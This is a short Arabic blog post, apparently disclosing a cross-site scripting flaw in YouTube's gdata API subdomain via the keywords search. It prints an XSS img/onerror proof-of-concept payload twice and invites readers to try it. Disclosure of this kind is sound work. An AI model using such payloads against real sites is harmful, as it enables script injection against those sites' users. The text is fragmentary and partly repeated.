وذلك في النطاق الفرعي للموقع والمخصص إلى واجهة برمجة التطبيقات
http://gdata.youtube.com/
الثغرة التي تم الكشف عنها من طرف عدة مصادر ، حيث يمكن فقط وضع كود الثغرة في مكان
AND تم النقر على كلمة keywords
XSS ليضهر بوضوح ان الموقع مصاب بثغرة
يمكنك تجربة ذلك بنفسك عن طريق الكود الاتي
<img src="<img src=search"/onerror=alert("www.th3pro.com")//">
فيديو تطبيقي للثغرة
<img src="<img src=search"/onerror=alert("www.th3pro.com")//">
فيديو تطبيقي للثغرة
ليست هناك تعليقات:
إرسال تعليق